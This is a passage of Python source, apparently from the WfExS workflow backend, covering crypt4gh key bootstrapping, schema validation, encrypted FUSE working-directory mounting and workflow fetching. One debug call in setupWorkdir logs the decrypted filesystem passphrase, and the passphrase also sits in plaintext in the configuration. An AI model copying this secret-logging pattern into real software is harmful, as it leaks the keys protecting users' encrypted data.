    # This one is to assure the working directory is created
    workDir = local_config.get('workDir')
    if workDir:
        if not os.path.isabs(workDir):
            workDir = os.path.normpath(os.path.join(config_directory, workDir))
        os.makedirs(workDir, exist_ok=True)

    # Now, checking whether public and private key pairs exist
    numExist = 0
    crypt4ghSect = local_config.get(cls.CRYPT4GH_SECTION)
    if crypt4ghSect is None:
        local_config[cls.CRYPT4GH_SECTION] = {}
        crypt4ghSect = local_config[cls.CRYPT4GH_SECTION]

    for elem in (cls.CRYPT4GH_PRIVKEY_KEY, cls.CRYPT4GH_PUBKEY_KEY):
        fname = crypt4ghSect.get(elem)
        # The default when no filename exist is creating hidden files in the config directory
        if fname is None:
            fname = key_prefix + '.' + elem
            crypt4ghSect[elem] = fname
            updated = True
        if not os.path.isabs(fname):
            fname = os.path.normpath(os.path.join(config_directory, fname))

        if os.path.exists(fname):
            if os.path.getsize(fname) == 0:
                logger.warning("[WARNING] Installation {} file {} is empty".format(elem, fname))
            else:
                numExist += 1
        else:
            logger.warning("[WARNING] Installation {} file {} does not exist".format(elem, fname))

    # Having only one of the pair is unrecoverable: refuse to continue.
    if numExist == 1:
        raise WFException("Inconsistent {} section, as one of the keys is missing".format(cls.CRYPT4GH_SECTION))

    # Time to generate the pairs needed to work with crypt4gh
    if numExist == 0:
        privKey = crypt4ghSect[cls.CRYPT4GH_PRIVKEY_KEY]
        if not os.path.isabs(privKey):
            privKey = os.path.normpath(os.path.join(config_directory, privKey))
        pubKey = crypt4ghSect[cls.CRYPT4GH_PUBKEY_KEY]
        if not os.path.isabs(pubKey):
            pubKey = os.path.normpath(os.path.join(config_directory, pubKey))

        if cls.CRYPT4GH_PASSPHRASE_KEY not in crypt4ghSect:
            passphrase = cls.generate_passphrase()
            crypt4ghSect[cls.CRYPT4GH_PASSPHRASE_KEY] = passphrase
            updated = True
        else:
            passphrase = crypt4ghSect[cls.CRYPT4GH_PASSPHRASE_KEY]

        comment = 'WfExS crypt4gh keys {} {} {}'.format(socket.gethostname(), config_directory,
                                                        datetime.datetime.now().isoformat())
        crypt4gh.keys.c4gh.generate(privKey, pubKey, passphrase=passphrase.encode('utf-8'),
                                    comment=comment.encode('utf-8'))

    return updated, local_config
@classmethod
def FromDescription(cls, workflow_meta, local_config, creds_config=None, config_directory=None):
    """
    Factory: bootstrap the local installation, then build a WF instance
    already set up from a workflow staging description.

    :param workflow_meta: The configuration describing both the workflow
    and the inputs to use when it is being instantiated.
    :param local_config: Relevant local configuration, like the cache directory.
    :param creds_config: Dictionary with the different credential contexts (to be implemented)
    :param config_directory: Directory used to resolve relative paths
    :type workflow_meta: dict
    :type local_config: dict
    :type creds_config: dict
    :return: Workflow configuration
    """
    if creds_config is None:
        creds_config = {}

    # bootstrap() mutates local_config in place, so the returned copy is
    # deliberately discarded here; only the side effects are needed.
    _, updated_local_config = cls.bootstrap(local_config, config_directory=config_directory)

    return cls(
        local_config,
        config_directory=config_directory
    ).newSetup(
        workflow_meta['workflow_id'],
        workflow_meta.get('version'),
        descriptor_type=workflow_meta.get('workflow_type'),
        trs_endpoint=workflow_meta.get('trs_endpoint', cls.DEFAULT_TRS_ENDPOINT),
        params=workflow_meta.get('params', {}),
        outputs=workflow_meta.get('outputs', {}),
        workflow_config=workflow_meta.get('workflow_config'),
        creds_config=creds_config
    )
@classmethod
def ConfigValidate(cls, configToValidate, relSchemaFile):
    """Validate a configuration mapping against one of the bundled JSON
    schemas; returns the (possibly empty) list of validation errors.

    :param configToValidate: the configuration block to check
    :param relSchemaFile: schema filename, relative to SCHEMAS_REL_DIR
    :raises WFException: when the schema cannot be loaded or applied
    """
    # Locating the schemas directory, where all the schemas should be placed
    schemaFile = os.path.join(os.path.dirname(__file__), cls.SCHEMAS_REL_DIR, relSchemaFile)

    try:
        with open(schemaFile, mode="r", encoding="utf-8") as sF:
            loadedSchema = json.load(sF)
        validator = jsonschema.validators.validator_for(loadedSchema)(loadedSchema)
        return list(validator.iter_errors(instance=configToValidate))
    except Exception as e:
        raise WFException(f"FATAL ERROR: corrupted schema {relSchemaFile}. Reason: {e}")
def __init__(self, local_config=None, config_directory=None):
    """
    Init function: validates the local configuration, loads the crypt4gh
    key pair, and creates the cache and working directory layout.

    :param local_config: Local setup configuration, telling where caching directories live
    :param config_directory: Directory used to resolve relative paths
    :type local_config: dict
    """
    # Getting a logger focused on specific classes
    self.logger = logging.getLogger(self.__class__.__name__)

    if not isinstance(local_config, dict):
        local_config = {}

    # validate the local configuration object
    valErrors = self.ConfigValidate(local_config, self.CONFIG_SCHEMA)
    if len(valErrors) > 0:
        self.logger.error(f'ERROR in local configuration block: {valErrors}')
        sys.exit(1)

    self.local_config = local_config

    # External tool commands (git, encrypted filesystem helpers)
    toolSect = local_config.get('tools', {})
    self.git_cmd = toolSect.get('gitCommand', DEFAULT_GIT_CMD)

    encfsSect = toolSect.get('encrypted_fs', {})
    encfs_type = encfsSect.get('type', DEFAULT_ENCRYPTED_FS_TYPE)
    try:
        encfs_type = EncryptedFSType(encfs_type)
    except:
        raise WFException('Invalid default encryption filesystem {}'.format(encfs_type))
    if encfs_type not in ENCRYPTED_FS_MOUNT_IMPLEMENTATIONS:
        raise WFException('FIXME: Default encryption filesystem {} mount procedure is not implemented')
    self.encfs_type = encfs_type
    self.encfs_cmd = shutil.which(encfsSect.get('command', DEFAULT_ENCRYPTED_FS_CMD[self.encfs_type]))
    self.fusermount_cmd = encfsSect.get('fusermount_command', DEFAULT_FUSERMOUNT_CMD)
    self.encfs_idleMinutes = encfsSect.get('idle', DEFAULT_ENCRYPTED_FS_IDLE_TIMEOUT)

    # Getting the config directory, needed for relative filenames
    # NOTE(review): `os` and `tempfile` are expected to arrive via the
    # wildcard imports from .common / .encrypted_fs — confirm.
    if config_directory is None:
        config_directory = os.getcwd()
    if not os.path.isabs(config_directory):
        config_directory = os.path.abspath(config_directory)
    self.config_directory = config_directory

    # Getting the private and public keys, needed from this point
    # (bootstrap() is expected to have populated these entries).
    crypt4ghSect = local_config.get(self.CRYPT4GH_SECTION, {})
    privKeyFilename = crypt4ghSect[self.CRYPT4GH_PRIVKEY_KEY]
    if not os.path.isabs(privKeyFilename):
        privKeyFilename = os.path.normpath(os.path.join(config_directory, privKeyFilename))
    pubKeyFilename = crypt4ghSect[self.CRYPT4GH_PUBKEY_KEY]
    if not os.path.isabs(pubKeyFilename):
        pubKeyFilename = os.path.normpath(os.path.join(config_directory, pubKeyFilename))
    passphrase = crypt4ghSect[self.CRYPT4GH_PASSPHRASE_KEY]

    # These are the keys to be used
    self.pubKey = crypt4gh.keys.get_public_key(pubKeyFilename)
    self.privKey = crypt4gh.keys.get_private_key(privKeyFilename, lambda: passphrase)

    # This directory will be used to cache repositories and distributable inputs
    cacheDir = local_config.get('cacheDir')
    if cacheDir:
        if not os.path.isabs(cacheDir):
            cacheDir = os.path.normpath(os.path.join(config_directory, cacheDir))
        os.makedirs(cacheDir, exist_ok=True)
    else:
        cacheDir = tempfile.mkdtemp(prefix='WfExS', suffix='backend')
        # Assuring this temporal directory is removed at the end
        atexit.register(shutil.rmtree, cacheDir)

    # Setting up caching directories
    self.cacheDir = cacheDir
    self.cacheWorkflowDir = os.path.join(cacheDir, 'wf-cache')
    os.makedirs(self.cacheWorkflowDir, exist_ok=True)
    self.cacheROCrateDir = os.path.join(cacheDir, 'ro-crate-cache')
    os.makedirs(self.cacheROCrateDir, exist_ok=True)
    self.cacheTRSFilesDir = os.path.join(cacheDir, 'trs-files-cache')
    os.makedirs(self.cacheTRSFilesDir, exist_ok=True)
    self.cacheWorkflowInputsDir = os.path.join(cacheDir, 'wf-inputs')
    os.makedirs(self.cacheWorkflowInputsDir, exist_ok=True)

    # This directory will be used to store the intermediate
    # and final results before they are sent away
    workDir = local_config.get('workDir')
    if workDir:
        if not os.path.isabs(workDir):
            workDir = os.path.normpath(os.path.join(config_directory, workDir))
        os.makedirs(workDir, exist_ok=True)
    else:
        workDir = tempfile.mkdtemp(prefix='WfExS-workdir', suffix='backend')
        # Assuring this temporal directory is removed at the end
        atexit.register(shutil.rmtree, workDir)
    self.baseWorkDir = workDir

    # Per-instance working state, populated later by setup/marshalling
    self.rawWorkDir = None
    self.workDir = None
    self.encWorkDir = None
    self.tempDir = None
    self.encfsThread = None
    self.doUnmount = False
    self.paranoidMode = False
    self.bag = None

    self.stageMarshalled = False
    self.executionMarshalled = False
    self.exportMarshalled = False

    # cacheHandler is created on first use
    self.cacheHandler = SchemeHandlerCacheHandler(self.cacheDir, {})
    # All the custom ones should be added here
    self.cacheHandler.addSchemeHandlers(PRIDE_SCHEME_HANDLERS)
    self.cacheHandler.addSchemeHandlers(INTERNAL_TRS_SCHEME_HANDLERS)
    # These ones should have prevalence over other custom ones
    self.cacheHandler.addSchemeHandlers(DEFAULT_SCHEME_HANDLERS)
def newSetup(self,
             workflow_id,
             version_id,
             descriptor_type=None,
             trs_endpoint=DEFAULT_TRS_ENDPOINT,
             params=None,
             outputs=None,
             workflow_config=None,
             creds_config=None
             ):
    """
    Init function

    Validates the staging definition and security contexts against their
    schemas, normalizes the TRS endpoint, creates (or reuses) the raw and
    working directories, persists the staging definition and resets all the
    workflow/engine derived state.

    :param workflow_id: A unique identifier of the workflow. Although it is an integer in WorkflowHub,
    we cannot assume it is so in all the GA4GH TRS implementations which are exposing workflows.
    :param version_id: An identifier of the workflow version. Although it is an integer in
    WorkflowHub, we cannot assume the format of the version id, as it could follow semantic
    versioning, providing an UUID, etc.
    :param descriptor_type: The type of descriptor that represents this version of the workflow
    (e.g. CWL, WDL, NFL, or GALAXY). It is optional, so it is guessed from the calls to the API.
    :param trs_endpoint: The TRS endpoint used to find the workflow.
    :param params: Optional params for the workflow execution.
    :param outputs:
    :param workflow_config: Tweaks for workflow enactment, like some overrides
    :param creds_config: Dictionary with the different credential contexts
    :type workflow_id: str
    :type version_id: str
    :type descriptor_type: str
    :type trs_endpoint: str
    :type params: dict
    :type outputs: dict
    :type workflow_config: dict
    :type creds_config: dict
    :return: this instance (so calls can be chained)
    :raises WFException: when the staging definition or the security context
    block do not validate against their schemas
    """
    if not isinstance(workflow_config, dict):
        workflow_config = {}

    # Rebuild the staging definition from the individual arguments, so it
    # can be validated against the staging definition JSON Schema
    workflow_meta = {
        'workflow_id': workflow_id
    }
    if version_id is not None:
        workflow_meta['version'] = version_id
    if descriptor_type is not None:
        workflow_meta['workflow_type'] = descriptor_type
    if trs_endpoint is not None:
        workflow_meta['trs_endpoint'] = trs_endpoint
    if workflow_config is not None:
        workflow_meta['workflow_config'] = workflow_config
    if params is not None:
        workflow_meta['params'] = params
    if outputs is not None:
        workflow_meta['outputs'] = outputs

    # Fail early when the staging definition does not match the schema
    valErrors = self.ConfigValidate(workflow_meta, self.STAGE_DEFINITION_SCHEMA)
    if len(valErrors) > 0:
        self.logger.error(f'ERROR in workflow staging definition block: {valErrors}')
        raise WFException(f'ERROR in workflow staging definition block: {valErrors}')

    if not isinstance(creds_config, dict):
        creds_config = {}

    # Fail early when the security contexts do not match the schema
    valErrors = self.ConfigValidate(creds_config, self.SECURITY_CONTEXT_SCHEMA)
    if len(valErrors) > 0:
        self.logger.error(f'ERROR in security context block: {valErrors}')
        raise WFException(f'ERROR in security context block: {valErrors}')

    # Normalize the optional containers after validation
    # NOTE(review): a list-shaped params block (which fetchInputs accepts)
    # is silently replaced by {} here — confirm this is intended
    if not isinstance(params, dict):
        params = {}

    if not isinstance(outputs, dict):
        outputs = {}

    # Workflow-specific
    self.workflow_config = workflow_config
    self.creds_config = creds_config

    self.id = str(workflow_id)
    self.version_id = str(version_id)
    self.descriptor_type = descriptor_type
    self.params = params
    self.outputs = self.parseExpectedOutputs(outputs)

    # The endpoint should always end with a slash
    if isinstance(trs_endpoint, str):
        if trs_endpoint[-1] != '/':
            trs_endpoint += '/'

        # Removing the tools suffix, which appeared in first WfExS iterations
        if trs_endpoint.endswith('/' + self.TRS_TOOLS_PATH):
            trs_endpoint = trs_endpoint[0:-len(self.TRS_TOOLS_PATH)]

    self.trs_endpoint = trs_endpoint

    if self.rawWorkDir is None:
        # First setup on this instance: mint a fresh instance id and create
        # its private raw working directory under the base working directory
        self.instanceId = str(uuid.uuid4())

        # This directory is the raw working directory
        # If the intermediate results should be hold in an encrypted
        # temporary directory, this directory will hold it
        uniqueRawWorkDir = os.path.join(self.baseWorkDir, self.instanceId)
        os.makedirs(uniqueRawWorkDir, exist_ok=True)
        self.rawWorkDir = uniqueRawWorkDir

    # TODO: enforce restrictive permissions on each raw working directory
    self.allowOther = False

    self.secure = workflow_config.get('secure', True)

    if self.workDir is None:
        # An encrypted working directory is used unless explicitly disabled;
        # paranoid mode always forces it
        doSecureWorkDir = self.secure or self.paranoidMode

        self.setupWorkdir(doSecureWorkDir)

    # This directory will hold either symbolic links to the cached
    # inputs, or the inputs properly post-processed (decompressed,
    # decrypted, etc....)
    self.inputsDir = os.path.join(self.workDir, WORKDIR_INPUTS_RELDIR)
    os.makedirs(self.inputsDir, exist_ok=True)
    # This directory should hold intermediate workflow steps results
    self.intermediateDir = os.path.join(self.workDir, WORKDIR_INTERMEDIATE_RELDIR)
    os.makedirs(self.intermediateDir, exist_ok=True)
    # This directory will hold the final workflow results, which could
    # be either symbolic links to the intermediate results directory
    # or newly generated content
    self.outputsDir = os.path.join(self.workDir, WORKDIR_OUTPUTS_RELDIR)
    os.makedirs(self.outputsDir, exist_ok=True)
    # This directory is here for those files which are created in order
    # to tweak or patch workflow executions
    self.engineTweaksDir = os.path.join(self.workDir, WORKDIR_ENGINE_TWEAKS_RELDIR)
    os.makedirs(self.engineTweaksDir, exist_ok=True)
    # This directory will hold metadata related to the execution
    self.metaDir = os.path.join(self.workDir, WORKDIR_META_RELDIR)
    os.makedirs(self.metaDir, exist_ok=True)

    # Persist the staging definition, without clobbering a previous one
    self.marshallConfig(overwrite=False)

    # Reset all the state derived from fetching/identifying the workflow
    self.repoURL = None
    self.repoTag = None
    self.repoRelPath = None
    self.repoDir = None
    self.repoEffectiveCheckout = None
    self.engine = None
    self.engineVer = None
    self.engineDesc = None

    self.materializedParams = None
    self.localWorkflow = None
    self.materializedEngine = None
    self.listOfContainers = None

    self.exitVal = None
    self.augmentedInputs = None
    self.matCheckOutputs = None
    self.cacheROCrateFilename = None

    return self
# System-wide FUSE configuration file, parsed by setupWorkdir to detect
# whether 'user_allow_other' is enabled
FUSE_SYSTEM_CONF = '/etc/fuse.conf'
def setupWorkdir(self, doSecureWorkDir):
    """
    Set up the per-instance working directory inside the raw working directory.

    When doSecureWorkDir is True, an encrypted FUSE filesystem is mounted on
    '<rawWorkDir>/work' backed by '<rawWorkDir>/.crypt'; the filesystem
    passphrase is kept in the raw working directory, encrypted with this
    instance's crypt4gh key pair, so an existing encrypted workdir can be
    reopened later. A daemon thread is started to keep the mount alive.

    Side effects: sets self.encWorkDir, self.workDir, self.tempDir,
    self.allowOther and (when a mount was done) self.doUnmount and
    self.encfsThread.

    :param doSecureWorkDir: whether the working directory must live on an
    encrypted filesystem
    :raises WFException: when the stored passphrase file references an
    unknown or unimplemented encryption filesystem, or has a bad format
    """
    uniqueRawWorkDir = self.rawWorkDir

    allowOther = False
    if doSecureWorkDir:
        # We need to detect whether fuse has enabled user_allow_other
        # the only way I know is parsing /etc/fuse.conf
        if not self.paranoidMode and os.path.exists(self.FUSE_SYSTEM_CONF):
            with open(self.FUSE_SYSTEM_CONF, mode="r") as fsc:
                for line in fsc:
                    if line.startswith('user_allow_other'):
                        allowOther = True
                        break
            self.logger.debug(f"FUSE has user_allow_other: {allowOther}")

        uniqueEncWorkDir = os.path.join(uniqueRawWorkDir, '.crypt')
        uniqueWorkDir = os.path.join(uniqueRawWorkDir, 'work')

        # The directories should exist before calling encryption FS mount
        os.makedirs(uniqueEncWorkDir, exist_ok=True)
        os.makedirs(uniqueWorkDir, exist_ok=True)

        # This is the passphrase needed to decrypt the filesystem
        passphraseFile = os.path.join(uniqueRawWorkDir, WORKDIR_PASSPHRASE_FILE)

        encfs_cmd = self.encfs_cmd
        if os.path.exists(passphraseFile):
            # Reusing an existing encrypted workdir: recover the passphrase,
            # stored crypt4gh-encrypted for this instance's private key
            clearF = io.BytesIO()
            with open(passphraseFile, mode="rb") as encF:
                crypt4gh.lib.decrypt(
                    [(0, self.privKey, None)],
                    encF,
                    clearF,
                    offset=0,
                    span=None,
                    sender_pubkey=None
                )

            # Stored cleartext format is '<encfs type>=<passphrase>'
            encfs_type, _, securePassphrase = clearF.getvalue().decode('utf-8').partition('=')
            self.logger.debug(encfs_type + ' ' + securePassphrase)
            try:
                encfs_type = EncryptedFSType(encfs_type)
            # BUGFIX: was a bare 'except:'; an invalid Enum value raises ValueError
            except ValueError:
                raise WFException('Invalid encryption filesystem {} in working directory'.format(encfs_type))
            if encfs_type not in ENCRYPTED_FS_MOUNT_IMPLEMENTATIONS:
                # BUGFIX: the '{}' placeholder was never filled in
                raise WFException('FIXME: Encryption filesystem {} mount procedure is not implemented'.format(encfs_type))

            # If the working directory encrypted filesystem does not
            # match the configured one, use its default executable
            if encfs_type != self.encfs_type:
                encfs_cmd = DEFAULT_ENCRYPTED_FS_CMD[encfs_type]

            if securePassphrase == '':
                raise WFException('Encryption filesystem key does not follow the right format')
        else:
            # Fresh encrypted workdir: generate a new passphrase and store it
            # crypt4gh-encrypted with the instance's key pair
            securePassphrase = self.generate_passphrase()
            encfs_type = self.encfs_type
            clearF = io.BytesIO((encfs_type.value + '=' + securePassphrase).encode('utf-8'))
            with open(passphraseFile, mode="wb") as encF:
                crypt4gh.lib.encrypt(
                    [(0, self.privKey, self.pubKey)],
                    clearF,
                    encF,
                    offset=0,
                    span=None
                )
        del clearF

        # Warn/fail earlier
        if os.path.ismount(uniqueWorkDir):
            # raise WFException("Destination mount point {} is already in use")
            self.logger.warning("Destination mount point {} is already in use".format(uniqueWorkDir))
        else:
            # Now, time to mount the encrypted FS
            ENCRYPTED_FS_MOUNT_IMPLEMENTATIONS[encfs_type](encfs_cmd, self.encfs_idleMinutes, uniqueEncWorkDir,
                                                           uniqueWorkDir, uniqueRawWorkDir, securePassphrase,
                                                           allowOther)

            # and start the thread which keeps the mount working
            self.encfsThread = threading.Thread(target=self._wakeupEncDir, daemon=True)
            self.encfsThread.start()

            # We are going to unmount what we have mounted
            self.doUnmount = True

        # self.encfsPassphrase = securePassphrase
        del securePassphrase
    else:
        # Plain (unencrypted) setup: work directly on the raw directory
        uniqueEncWorkDir = None
        uniqueWorkDir = uniqueRawWorkDir

    # The temporary directory is in the raw working directory as
    # some container engine could fail
    uniqueTempDir = os.path.join(uniqueRawWorkDir, '.TEMP')
    os.makedirs(uniqueTempDir, exist_ok=True)
    # Sticky world-writable, like /tmp
    os.chmod(uniqueTempDir, 0o1777)

    # Setting up working directories, one per instance
    self.encWorkDir = uniqueEncWorkDir
    self.workDir = uniqueWorkDir
    self.tempDir = uniqueTempDir
    self.allowOther = allowOther
def _wakeupEncDir(self):
    """
    Keep the mounted encrypted working directory alive.

    Runs forever in a daemon thread: every minute it stats the working
    directory so the FUSE mount sees periodic activity (presumably to keep
    idle-based auto-unmount timers from firing — see encfs_idleMinutes).
    """
    poll_seconds = 60
    while True:
        time.sleep(poll_seconds)
        # The isdir call is done purely for its filesystem-access side effect
        os.path.isdir(self.workDir)
def unmountWorkdir(self):
    """
    Unmount the encrypted working directory, when this instance mounted one.

    Does nothing unless self.doUnmount is set and an encrypted workdir
    exists. On success (or when nothing was mounted any more) the unmount
    bookkeeping attributes are reset so the work is not repeated.

    :raises WFException: when fusermount fails, embedding its stdout/stderr
    """
    if not (self.doUnmount and (self.encWorkDir is not None)):
        return

    # Only unmount if it is needed
    if os.path.ismount(self.workDir):
        with tempfile.NamedTemporaryFile() as umount_out, tempfile.NamedTemporaryFile() as umount_err:
            umount_command = [
                self.fusermount_cmd,
                '-u',  # Umount the directory
                '-z',  # Even if it is not possible to umount it now, hide the mount point
                self.workDir,
            ]
            retval = subprocess.Popen(
                umount_command,
                stdout=umount_out,
                stderr=umount_err,
            ).wait()

            if retval != 0:
                # Recover the captured output to build a meaningful error
                with open(umount_out.name, mode="r") as c_stF:
                    umount_stdout_v = c_stF.read()
                with open(umount_err.name, mode="r") as c_stF:
                    umount_stderr_v = c_stF.read()

                errstr = "Could not umount {} (retval {})\nCommand: {}\n======\nSTDOUT\n======\n{}\n======\nSTDERR\n======\n{}".format(
                    self.encfs_type, retval, ' '.join(umount_command), umount_stdout_v,
                    umount_stderr_v)
                raise WFException(errstr)

    # This is needed to avoid double work
    self.doUnmount = False
    self.encWorkDir = None
    self.workDir = None
def cleanup(self):
    """Release held resources (currently the encrypted workdir mount, if any)."""
    self.unmountWorkdir()
def fromWorkDir(self, workflowWorkingDirectory):
    """
    Resume a previously staged instance from its working directory.

    The directory basename is reused as the instance id, the (possibly
    encrypted) working directory is re-mounted, and the stored metadata
    files are loaded through fromFiles.

    :param workflowWorkingDirectory: absolute path, or path relative to
    self.baseWorkDir, of an existing staged working directory
    :return: the result of self.fromFiles over the stored metadata files
    :raises WFException: when no directory is provided, it does not exist,
    or the metadata directory is missing
    """
    if workflowWorkingDirectory is None:
        raise WFException('Unable to initialize, no directory provided')

    # Obtaining the absolute path to the working directory
    if not os.path.isabs(workflowWorkingDirectory):
        workflowWorkingDirectory = os.path.normpath(os.path.join(self.baseWorkDir, workflowWorkingDirectory))

    if not os.path.isdir(workflowWorkingDirectory):
        raise WFException('Unable to initialize, {} is not a directory'.format(workflowWorkingDirectory))

    self.rawWorkDir = workflowWorkingDirectory
    self.instanceId = os.path.basename(workflowWorkingDirectory)

    # This is needed to parse
    passphraseFile = os.path.join(self.rawWorkDir, WORKDIR_PASSPHRASE_FILE)

    # Setting up the directory
    # The presence of a stored passphrase file marks an encrypted workdir
    self.setupWorkdir(os.path.exists(passphraseFile))

    metaDir = os.path.join(self.workDir, WORKDIR_META_RELDIR)
    if not os.path.isdir(metaDir):
        raise WFException("Staged working directory {} is incomplete".format(self.workDir))

    # In order to be able to build next paths to call
    workflowMetaFilename = os.path.join(metaDir, WORKDIR_WORKFLOW_META_FILE)
    securityContextFilename = os.path.join(metaDir, WORKDIR_SECURITY_CONTEXT_FILE)

    return self.fromFiles(workflowMetaFilename, securityContextFilename)
def enableParanoidMode(self):
    """Switch on paranoid mode (forces secure workdirs and disables caching)."""
    self.paranoidMode = True
def fromFiles(self, workflowMetaFilename, securityContextsConfigFilename=None, paranoidMode=False):
    """
    Stage a workflow instance from on-disk YAML files.

    :param workflowMetaFilename: path to the workflow staging definition (YAML)
    :param securityContextsConfigFilename: optional path to the security
    contexts (credentials) file; ignored when missing
    :param paranoidMode: forwarded to fromDescription
    :return: the result of self.fromDescription
    """
    with open(workflowMetaFilename, mode="r", encoding="utf-8") as wmf:
        workflow_meta = unmarshall_namedtuple(yaml.load(wmf, Loader=YAMLLoader))

    # Last, try loading the security contexts credentials file
    creds_config = {}
    if securityContextsConfigFilename and os.path.exists(securityContextsConfigFilename):
        with open(securityContextsConfigFilename, mode="r", encoding="utf-8") as sccf:
            creds_config = unmarshall_namedtuple(yaml.load(sccf, Loader=YAMLLoader))

    return self.fromDescription(workflow_meta, creds_config, paranoidMode=paranoidMode)
def validateConfigFiles(self, workflowMetaFilename, securityContextsConfigFilename=None):
    """
    Validate a staging definition file and (optionally) a security contexts
    file against their JSON Schemas, logging every validation error found.

    :param workflowMetaFilename: path to the workflow staging definition (YAML)
    :param securityContextsConfigFilename: optional path to the security
    contexts (credentials) file; skipped when missing
    :return: 1 when at least one validation error was found, 0 otherwise
    """
    numErrors = 0
    self.logger.info(f'Validating {workflowMetaFilename}')

    with open(workflowMetaFilename, mode="r", encoding="utf-8") as wcf:
        workflow_meta = unmarshall_namedtuple(yaml.load(wcf, Loader=YAMLLoader))

    # Non-dict content (e.g. an empty file) is validated as an empty block
    if not isinstance(workflow_meta, dict):
        workflow_meta = {}

    valErrors = self.ConfigValidate(workflow_meta, self.STAGE_DEFINITION_SCHEMA)
    if len(valErrors) == 0:
        self.logger.info('No validation errors in staging definition block')
    else:
        for iErr, valError in enumerate(valErrors):
            self.logger.error(f'ERROR {iErr} in staging definition block: {valError}')
            numErrors += 1

    # Last, try loading the security contexts credentials file
    if securityContextsConfigFilename and os.path.exists(securityContextsConfigFilename):
        self.logger.info(f'Validating {securityContextsConfigFilename}')
        with open(securityContextsConfigFilename, mode="r", encoding="utf-8") as scf:
            creds_config = unmarshall_namedtuple(yaml.load(scf, Loader=YAMLLoader))

        valErrors = self.ConfigValidate(creds_config, self.SECURITY_CONTEXT_SCHEMA)
        if len(valErrors) == 0:
            self.logger.info('No validation errors in security block')
        else:
            for iErr, valError in enumerate(valErrors):
                self.logger.error(f'ERROR {iErr} in security context block: {valError}')
                numErrors += 1

    # Exit-code style result: non-zero means validation problems
    return 1 if numErrors > 0 else 0
def fromDescription(self, workflow_meta, creds_config=None, paranoidMode=False):
    """
    Stage a workflow instance from an in-memory staging definition.

    :param workflow_meta: The configuration describing both the workflow
    and the inputs to use when it is being instantiated.
    :param creds_config: Dictionary with the different credential contexts (to be implemented)
    :param paranoidMode: whether to enable paranoid mode; a 'paranoid_mode'
    key stored inside workflow_meta takes precedence over this argument
    :type workflow_meta: dict
    :type creds_config: dict
    :type paranoidMode: bool
    :return: Workflow configuration
    """
    # The preserved paranoid mode must be honoured
    storedParanoid = workflow_meta.get('paranoid_mode')
    if storedParanoid is not None:
        paranoidMode = storedParanoid

    if paranoidMode:
        self.enableParanoidMode()

    return self.newSetup(
        workflow_meta['workflow_id'],
        workflow_meta.get('version'),
        descriptor_type=workflow_meta.get('workflow_type'),
        trs_endpoint=workflow_meta.get('trs_endpoint', self.DEFAULT_TRS_ENDPOINT),
        params=workflow_meta.get('params', {}),
        outputs=workflow_meta.get('outputs', {}),
        workflow_config=workflow_meta.get('workflow_config'),
        creds_config=creds_config
    )
def fromForm(self, workflow_meta, paranoidMode=False):  # VRE
    """
    Stage a workflow instance from a (VRE) form-derived staging definition.

    Unlike fromDescription, neither outputs nor credential contexts are
    taken from the given description, and no stored paranoid mode flag is
    honoured.

    :param workflow_meta: The configuration describing both the workflow
    and the inputs to use when it is being instantiated.
    :param paranoidMode:
    :type workflow_meta: dict
    :type paranoidMode: bool
    :return: Workflow configuration
    """
    if paranoidMode:
        self.enableParanoidMode()

    return self.newSetup(
        workflow_meta['workflow_id'],
        workflow_meta.get('version'),
        descriptor_type=workflow_meta.get('workflow_type'),
        trs_endpoint=workflow_meta.get('trs_endpoint', self.DEFAULT_TRS_ENDPOINT),
        params=workflow_meta.get('params', {}),
        workflow_config=workflow_meta.get('workflow_config')
    )
def fetchWorkflow(self, offline=False):
    """
    Fetch the whole workflow description based on the data obtained
    from the TRS where it is being published.

    If the workflow id is an URL, it is supposed to be a git repository,
    and the version will represent either the branch, tag or specific commit.
    So, the whole TRS fetching machinery is bypassed.

    Side effects: populates self.repoURL/repoTag/repoRelPath (for URL-like
    repos), self.repoDir, self.repoEffectiveCheckout, self.engineDesc,
    self.engine, self.engineVer and self.localWorkflow.

    :param offline: forwarded to the TRS / RO-Crate fetching helpers
    :raises WFException: when no TRS endpoint is available for a bare id,
    a declared relative path is missing, or no engine recognizes the workflow
    """
    parsedRepoURL = parse.urlparse(self.id)

    # It is not an absolute URL, so it is being an identifier in the workflow
    if parsedRepoURL.scheme == '':
        if (self.trs_endpoint is not None) and len(self.trs_endpoint) > 0:
            engineDesc, repoURL, repoTag, repoRelPath = self.getWorkflowRepoFromTRS(offline=offline)
        else:
            raise WFException('trs_endpoint was not provided')
    else:
        engineDesc = None

        # Trying to be smarter
        guessedRepoURL, guessedRepoTag, guessedRepoRelPath = self.guessRepoParams(parsedRepoURL, fail_ok=False)

        if guessedRepoURL is not None:
            repoURL = guessedRepoURL
            # Fall back to the requested version when the guess has no tag
            repoTag = guessedRepoTag if guessedRepoTag is not None else self.version_id
            repoRelPath = guessedRepoRelPath
        else:
            # Not a recognizable repo URL: try interpreting it as an RO-Crate
            engineDesc, repoURL, repoTag, repoRelPath = self.getWorkflowRepoFromROCrateURL(self.id, offline=offline)

    if repoURL is None:
        # raise WFException('Unable to guess repository from RO-Crate manifest')
        # Last resort: treat the id itself as the repository
        repoURL = self.id
        repoTag = self.version_id
        repoRelPath = None

    repoDir = None
    repoEffectiveCheckout = None
    # An URL with a scheme means it is a repo we can materialize locally
    if ':' in repoURL:
        parsedRepoURL = parse.urlparse(repoURL)
        if len(parsedRepoURL.scheme) > 0:
            self.repoURL = repoURL
            self.repoTag = repoTag
            # It can be either a relative path to a directory or to a file
            # It could be even empty!
            if repoRelPath == '':
                repoRelPath = None
            self.repoRelPath = repoRelPath

            repoDir, repoEffectiveCheckout = self.doMaterializeRepo(repoURL, repoTag)

    # For the cases of pure TRS repos, like Dockstore
    if repoDir is None:
        repoDir = repoURL

    # Workflow Language version cannot be assumed here yet
    localWorkflow = LocalWorkflow(dir=repoDir, relPath=repoRelPath, effectiveCheckout=repoEffectiveCheckout)
    self.logger.info("materialized workflow repository (checkout {}): {}".format(repoEffectiveCheckout, repoDir))

    if repoRelPath is not None:
        if not os.path.exists(os.path.join(repoDir, repoRelPath)):
            raise WFException(
                "Relative path {} cannot be found in materialized workflow repository {}".format(repoRelPath,
                                                                                                 repoDir))
    # A valid engine must be identified from the fetched content
    # TODO: decide whether to force some specific version
    if engineDesc is None:
        # Try every registered engine until one recognizes the workflow;
        # note the for/else: the else clause fires only when no engine matched
        for engineDesc in self.WORKFLOW_ENGINES:
            self.logger.debug("Testing engine " + engineDesc.trs_descriptor)
            engine = engineDesc.clazz(cacheDir=self.cacheDir, workflow_config=self.workflow_config,
